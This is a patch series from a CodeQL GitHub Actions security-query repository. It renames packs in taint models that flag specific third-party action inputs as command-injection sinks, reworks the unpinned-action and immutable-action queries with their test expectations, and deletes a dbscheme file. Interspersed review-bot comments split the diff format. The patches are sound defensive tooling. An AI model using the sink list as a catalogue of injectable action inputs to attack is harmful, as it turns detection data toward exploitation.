+++ b/ql/lib/ext/manual/tim-actions_get-pr-commits.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["tim-actions/get-pr-commits", "*", "output.commits", "text", "manual"]
diff --git a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
index 872964f8215f..c9b65a303798 100644
--- a/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml
index 56f017635ce9..386142a2d128 100644
--- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/tj-actions/branch-names
diff --git a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
index 73fd66c11b9d..3cfedbdec2c8 100644
--- a/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
+++ b/ql/lib/ext/manual/tmelliottjr_extract-regex-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["tmelliottjr/extract-regex-action", "*", "input.input", "output.resultString", "taint", "manual"]
diff --git a/ql/lib/ext/manual/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml
index 79a12582e9e4..9d5b8b88ce2f 100644
--- a/ql/lib/ext/manual/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/manual/trilom_file-changes-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
index a534e3dfcf75..3893986830a0 100644
--- a/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
index dfaa2e2687db..f2f99cc744a0 100644
--- a/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
+++ b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
index f87beb15018c..5a226f121032 100644
--- a/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/manual/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml
index 59cc155b5507..d3e1daae67ac 100644
--- a/ql/lib/ext/manual/veracode_veracode-sca.model.yml
+++ b/ql/lib/ext/manual/veracode_veracode-sca.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
index 38d892966d4a..91a9ad11aa6d 100644
--- a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
+++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/w3f/action-find-old-files
diff --git a/ql/lib/ext/manual/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml
index 52dcff39903b..b1f8b91a22de 100644
--- a/ql/lib/ext/manual/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/manual/wearerequired_lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
index f9e122c17a9c..48b11c1c5b20 100644
--- a/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
index bfbd4e2f7294..1ed8c0fd3f7c 100644
--- a/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
+++ b/ql/lib/ext/manual/xom9ikk_dotenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["xom9ikk/dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
index e4b34c37d70b..bfbd1dd12e6e 100644
--- a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
+++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
index c65f7b1055fb..db61e9171a87 100644
--- a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
+++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/yumemi-inc/changed-files
diff --git a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
index 91df4767a728..309045ee58dc 100644
--- a/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
index 57f76c8cb4ab..9da3749ebe45 100644
--- a/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
index 1a40a6341183..0cce7cc0cff7 100644
--- a/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
+++ b/ql/lib/ext/manual/zentered_issue-forms-body-parser.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["zentered/issue-forms-body-parser", "*", "input.body", "output.data", "taint", "manual"]
From e8ee798ffaa5a7f303f6af7ffb0a5cb956932222 Mon Sep 17 00:00:00 2001
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com>
Date: Thu, 7 Nov 2024 15:29:28 -0500
Subject: [PATCH 670/707] add temporary immutable actions doc page
---
ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md
index 754fe75b62be..33701ec27e67 100644
--- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md
+++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md
@@ -7,7 +7,7 @@ of the action stored in the GitHub package registry. The action code will not ch
 ## Recommendations
-When using [immutable actions]() use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs.
+When using [immutable actions](https://github.com/github/package-registry-team/blob/main/docs/immutable-actions/immutable-actions-howto.md) use the full semantic version of the action. This will ensure that the action is resolved to the exact version stored in the GitHub package registry. This will prevent the action code from changing between runs.
 ## Examples
From d6e38d5e83e162955f24ba5db5c2f84a0bbd466d Mon Sep 17 00:00:00 2001
From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com>
Date: Fri, 8 Nov 2024 11:51:25 -0500
Subject: [PATCH 671/707] Do not detect immutable actions in UnpinnedActionsTag
* these should be handles by the UseOfUnversionedImmutableAction.qll query instead
* factor out immutableAction detection for reuse in both queries
* octokit should not longer ping in UnpinnedActionsTag
---
.../actions/security/UseOfUnversionedImmutableAction.qll | 8 ++++++--
ql/src/Security/CWE-829/UnpinnedActionsTag.md | 2 +-
ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 8 +++++---
.../Security/CWE-829/UnpinnedActionsTag.expected | 5 -----
4 files changed, 12 insertions(+), 11 deletions(-)
diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
index 2fd47e3f8e19..bd14b6749206 100644
--- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
+++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
@@ -4,8 +4,7 @@ class UnversionedImmutableAction extends UsesStep {
 string immutable_action;
 UnversionedImmutableAction() {
- immutableActionsDataModel(immutable_action) and
- this.getCallee() = immutable_action and
+ isImmutableAction(this, immutable_action) and
 not isSemVer(this.getVersion())
 }
 }
@@ -23,3 +22,8 @@ predicate isSemVer(string version) {
 // or latest which will work
 or version = "latest"
 }
+
+predicate isImmutableAction(UsesStep actionStep, string actionName) {
+ immutableActionsDataModel(actionName) and
+ actionStep.getCallee() = actionName
+}
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
index eab708f8602e..d7c114f0404e 100644
--- a/ql/src/Security/CWE-829/UnpinnedActionsTag.md
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
@@ -6,7 +6,7 @@ Using a tag for a 3rd party Action that is not pinned to a commit can lead to ex
 ## Recommendations
-Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
+Pinning an action to a full length commit SHA is currently the only way to use a non-immutable action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
 ## Examples
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
index e0e668edfa81..de8d3c2078a8 100644
--- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
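Review bot: The new predicate `isImmutableAction` in the second hunk has no QLDoc, yet it is now the single shared decision point that both this library and UnpinnedActionsTag.ql use to exempt a `uses` step from the pinning check. A one-line doc such as `/** Holds if actionStep calls an action listed in the immutableActionsDataModel extensible data under actionName. */` would make the dependency on the data model explicit. Because exclusion from UnpinnedActionsTag now follows from list membership alone, the doc could also note that every entry added to that data model widens the set of unpinned references that go unreported, so reviewing additions to the data file carries the security decision.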
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql
@@ -1,6 +1,6 @@
 /**
- * @name Unpinned tag for 3rd party Action in workflow
- * @description Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
+ * @name Unpinned tag for a non-immutable Action in workflow
+ * @description Using a tag for a non-immutable Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
 * @kind problem
 * @security-severity 5.0
 * @problem.severity recommendation
@@ -12,6 +12,7 @@
 */
 import actions
+import codeql.actions.security.UseOfUnversionedImmutableAction
 bindingset[version]
 private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f0-9]{40}$") }
@@ -32,7 +33,8 @@ where
 ) and
 uses.getVersion() = version and
 not isTrustedOrg(repo) and
- not isPinnedCommit(version)
+ not isPinnedCommit(version) and
+ not isImmutableAction(uses, repo)
 select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString()
diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
index aa19c08f2f06..848962e26bd6 100644
--- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected
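Review bot: The added `not isImmutableAction(uses, repo)` in the last hunk drops every use of a listed immutable action from this query regardless of the ref, while UnversionedImmutableAction only reports refs that fail `isSemVer`, and that predicate (visible in the previous file's hunk) accepts `version = "latest"`. An immutable action referenced as `@latest` is therefore reported by neither query; if `latest` resolves to a floating pointer in the registry rather than a fixed release, this is a coverage gap that deserves a test case and a comment on the exclusion, e.g. `// immutable actions are handled by UnversionedImmutableAction, which accepts "latest"`. The alert text in `select` still reads "Unpinned 3rd party Action" although `@name` and `@description` now say "non-immutable Action"; aligning the message with the new metadata would keep alerts consistent with the query title. The `where` clause begins outside the hunk, so whether `repo` matches `getCallee()` for sub-directory action paths could not be checked here.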
@@ -10,12 +10,7 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit2.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit2.yml:20:15:20:43 | octokit/request-action@v2.x.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x.x', not a pinned commit hash | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit2.yml:34:15:34:42 | some-action/some-repo@latest | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'some-action/some-repo' with ref 'latest', not a pinned commit 
hash | .github/workflows/issue_comment_octokit2.yml:33:9:37:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | 
From 44fd14caaf023b055518ce7d1f11ce55db98d957 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 9 Nov 2024 10:40:04 +0100
Subject: [PATCH 672/707] Bump qlpack versions
---
ql/lib/qlpack.yml | 2 +-
ql/src/qlpack.yml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index a7df1c400bfc..b72f94d1bb15 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.85
+version: 0.2.0
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 96ba98407850..a9f045567b0b 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.85
+version: 0.2.0
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From be8a49228f3de26952beece271a747bcbb62778c Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 13 Nov 2024 13:42:57 -0500
Subject: [PATCH 673/707] Delete dbscheme Update after merge
---
ql/lib/ext/config/immutable_actions.yml | 2 +-
ql/lib/semmlecode.javascript.dbscheme | 1190 -
ql/lib/semmlecode.javascript.dbscheme.stats | 28248 ----------------
ql/test/codeql-pack.lock.yml | 22 +-
.../UnnecessaryUseOfAdvancedConfig.actual | 1 -
5 files changed, 17 insertions(+), 29446 deletions(-)
delete mode 100644 ql/lib/semmlecode.javascript.dbscheme
delete mode 100644 ql/lib/semmlecode.javascript.dbscheme.stats
delete mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual
diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml
index 072e8ed0b099..d6a9b1020d73 100644
--- a/ql/lib/ext/config/immutable_actions.yml
+++ b/ql/lib/ext/config/immutable_actions.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: immutableActionsDataModel
 data:
 - ["actions/checkout"]
diff --git a/ql/lib/semmlecode.javascript.dbscheme b/ql/lib/semmlecode.javascript.dbscheme
deleted file mode 100644
index c88c69174bd0..000000000000
--- a/ql/lib/semmlecode.javascript.dbscheme
+++ /dev/null
@@ -1,1190 +0,0 @@ -/*** Standard fragments ***/ - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Lines of code -*/ - -numlines( - int element_id: @sourceline ref, - int num_lines: int ref, - int num_code: int ref, - int num_comment: int ref -); - -/*- External data -*/ - -/** - * External data, loaded from CSV files during snapshot creation. See - * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) - * for more information. - */ -externalData( - int id : @externalDataElement, - string path : string ref, - int column: int ref, - string value : string ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. 
- */ -sourceLocationPrefix(string prefix : string ref); - -/*- JavaScript-specific part -*/ - -@location = @location_default - -@sourceline = @locatable; - -filetype( - int file: @file ref, - string filetype: string ref -) - -// top-level code fragments -toplevels (unique int id: @toplevel, - int kind: int ref); - -is_externs (int toplevel: @toplevel ref); - -case @toplevel.kind of - 0 = @script -| 1 = @inline_script -| 2 = @event_handler -| 3 = @javascript_url -| 4 = @template_toplevel; - -is_module (int tl: @toplevel ref); -is_nodejs (int tl: @toplevel ref); -is_es2015_module (int tl: @toplevel ref); -is_closure_module (int tl: @toplevel ref); - -@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; -toplevel_parent_xml_node( - unique int toplevel: @toplevel ref, - int xmlnode: @xml_node_with_code ref); - -xml_element_parent_expression( - unique int xmlnode: @xmlelement ref, - int expression: @expr ref, - int index: int ref); - -// statements -#keyset[parent, idx] -stmts (unique int id: @stmt, - int kind: int ref, - int parent: @stmt_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -stmt_containers (unique int stmt: @stmt ref, - int container: @stmt_container ref); - -jump_targets (unique int jump: @stmt ref, - int target: @stmt ref); - -@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; -@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; - -case @stmt.kind of - 0 = @empty_stmt -| 1 = @block_stmt -| 2 = @expr_stmt -| 3 = @if_stmt -| 4 = @labeled_stmt -| 5 = @break_stmt -| 6 = @continue_stmt -| 7 = @with_stmt -| 8 = @switch_stmt -| 9 = @return_stmt -| 10 = @throw_stmt -| 11 = @try_stmt -| 12 = @while_stmt -| 13 = @do_while_stmt -| 14 = @for_stmt -| 15 = @for_in_stmt -| 16 = @debugger_stmt -| 17 = @function_decl_stmt -| 18 = @var_decl_stmt -| 19 = @case -| 20 = @catch_clause -| 21 = 
@for_of_stmt -| 22 = @const_decl_stmt -| 23 = @let_stmt -| 24 = @legacy_let_stmt -| 25 = @for_each_stmt -| 26 = @class_decl_stmt -| 27 = @import_declaration -| 28 = @export_all_declaration -| 29 = @export_default_declaration -| 30 = @export_named_declaration -| 31 = @namespace_declaration -| 32 = @import_equals_declaration -| 33 = @export_assign_declaration -| 34 = @interface_declaration -| 35 = @type_alias_declaration -| 36 = @enum_declaration -| 37 = @external_module_declaration -| 38 = @export_as_namespace_declaration -| 39 = @global_augmentation_declaration -| 40 = @using_decl_stmt -; - -@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; - -@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; - -@namespace_definition = @namespace_declaration | @enum_declaration; -@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; - -is_instantiated(unique int decl: @namespace_declaration ref); - -@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; -has_declare_keyword(unique int stmt: @declarable_node ref); - -is_for_await_of(unique int forof: @for_of_stmt ref); - -// expressions -#keyset[parent, idx] -exprs (unique int id: @expr, - int kind: int ref, - int parent: @expr_parent ref, - int idx: int ref, - varchar(900) tostring: string ref); - -literals (varchar(900) value: string ref, - varchar(900) raw: string ref, - unique int expr: @expr_or_type ref); - -enclosing_stmt (unique int expr: @expr_or_type ref, - int stmt: @stmt ref); - -expr_containers (unique int expr: @expr_or_type ref, - int container: @stmt_container ref); - -array_size (unique int ae: @arraylike ref, - int sz: int ref); - -is_delegating (int yield: @yield_expr ref); - -@expr_or_stmt = @expr | @stmt; 
-@expr_or_type = @expr | @typeexpr; -@expr_parent = @expr_or_stmt | @property | @function_typeexpr; -@arraylike = @array_expr | @array_pattern; -@type_annotation = @typeexpr | @jsdoc_type_expr; -@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; - -case @expr.kind of - 0 = @label -| 1 = @null_literal -| 2 = @boolean_literal -| 3 = @number_literal -| 4 = @string_literal -| 5 = @regexp_literal -| 6 = @this_expr -| 7 = @array_expr -| 8 = @obj_expr -| 9 = @function_expr -| 10 = @seq_expr -| 11 = @conditional_expr -| 12 = @new_expr -| 13 = @call_expr -| 14 = @dot_expr -| 15 = @index_expr -| 16 = @neg_expr -| 17 = @plus_expr -| 18 = @log_not_expr -| 19 = @bit_not_expr -| 20 = @typeof_expr -| 21 = @void_expr -| 22 = @delete_expr -| 23 = @eq_expr -| 24 = @neq_expr -| 25 = @eqq_expr -| 26 = @neqq_expr -| 27 = @lt_expr -| 28 = @le_expr -| 29 = @gt_expr -| 30 = @ge_expr -| 31 = @lshift_expr -| 32 = @rshift_expr -| 33 = @urshift_expr -| 34 = @add_expr -| 35 = @sub_expr -| 36 = @mul_expr -| 37 = @div_expr -| 38 = @mod_expr -| 39 = @bitor_expr -| 40 = @xor_expr -| 41 = @bitand_expr -| 42 = @in_expr -| 43 = @instanceof_expr -| 44 = @logand_expr -| 45 = @logor_expr -| 47 = @assign_expr -| 48 = @assign_add_expr -| 49 = @assign_sub_expr -| 50 = @assign_mul_expr -| 51 = @assign_div_expr -| 52 = @assign_mod_expr -| 53 = @assign_lshift_expr -| 54 = @assign_rshift_expr -| 55 = @assign_urshift_expr -| 56 = @assign_or_expr -| 57 = @assign_xor_expr -| 58 = @assign_and_expr -| 59 = @preinc_expr -| 60 = @postinc_expr -| 61 = @predec_expr -| 62 = @postdec_expr -| 63 = @par_expr -| 64 = @var_declarator -| 65 = @arrow_function_expr -| 66 = @spread_element -| 67 = @array_pattern -| 68 = @object_pattern -| 69 = @yield_expr -| 70 = @tagged_template_expr -| 71 = @template_literal -| 72 = @template_element -| 73 = @array_comprehension_expr -| 74 = @generator_expr -| 75 = @for_in_comprehension_block -| 76 = @for_of_comprehension_block -| 77 = @legacy_letexpr -| 78 = @var_decl -| 79 = 
